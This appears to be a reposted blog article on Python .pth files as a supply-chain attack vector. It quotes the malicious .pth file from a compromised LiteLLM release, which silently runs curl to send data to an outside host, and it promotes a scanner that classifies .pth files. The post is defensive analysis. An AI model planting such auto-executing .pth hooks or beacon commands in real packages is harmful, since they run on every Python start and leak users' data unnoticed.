How .pth Files Became a Supply Chain Weapon (and How to Detect Them)

The Attack That Started It On March 24, 2026, LiteLLM 1.82.7 was published to PyPI. It contained a file called litellm_init.pth : import subprocess , sys subprocess . Popen ( [ ' curl ' , ' -s ' , ' https://models.litellm.cloud/beacon ' , ' -d ' , sys . version ], stdout = subprocess . DEVNULL , stderr = subprocess . DEVNULL ) This wasn't in the main code. It was in a .pth file. What Are .pth Files? Python's .pth (path) files live in site-packages/ and execute every time you start Python — not just during pip install . Most developers don't know this. Attackers do. Why Other Scanners Missed It Tool .pth Analysis pip-audit ❌ CVE database only Safety ❌ Known vulnerabilities Trivy ❌ SBOM + CVE socket.dev ❌ Not detected chaincanary ✅ Semantic classifier How chaincanary Works Instead of flagging all .pth files, chaincanary classifies them: EMPTY → silent PATH_ONLY → silent SAFE_CODE → LOW warning DANGEROUS → CRITICAL → MALICIOUS The LiteLLM file? subprocess.Popen(['curl', ...]) → DANGEROUS

How .pth Files Became a Supply Chain Weapon (and How to Detect Them)

Related Articles

We Tested This FREE TradingView Trend Indicator… It Only Works Here!

5 Campfire Songs Anyone Can Play on Guitar (Free Chord Charts)

Bybit vs HTX — Which Crypto Exchange Is Better? (2026)

Stop Posting Noise: Building in Public Needs Real Value

We got an audience with the "Lunar Viceroy" to talk how NASA will build a Moon base

Related Articles

How-To
We Tested This FREE TradingView Trend Indicator… It Only Works Here!
Medium Programming • 6h ago

How-To
5 Campfire Songs Anyone Can Play on Guitar (Free Chord Charts)
Dev.to Beginners • 8h ago

How-To
Bybit vs HTX — Which Crypto Exchange Is Better? (2026)
Dev.to Beginners • 8h ago

How-To
Stop Posting Noise: Building in Public Needs Real Value
Dev.to Beginners • 9h ago

How-To
We got an audience with the "Lunar Viceroy" to talk how NASA will build a Moon base
Ars Technica • 10h ago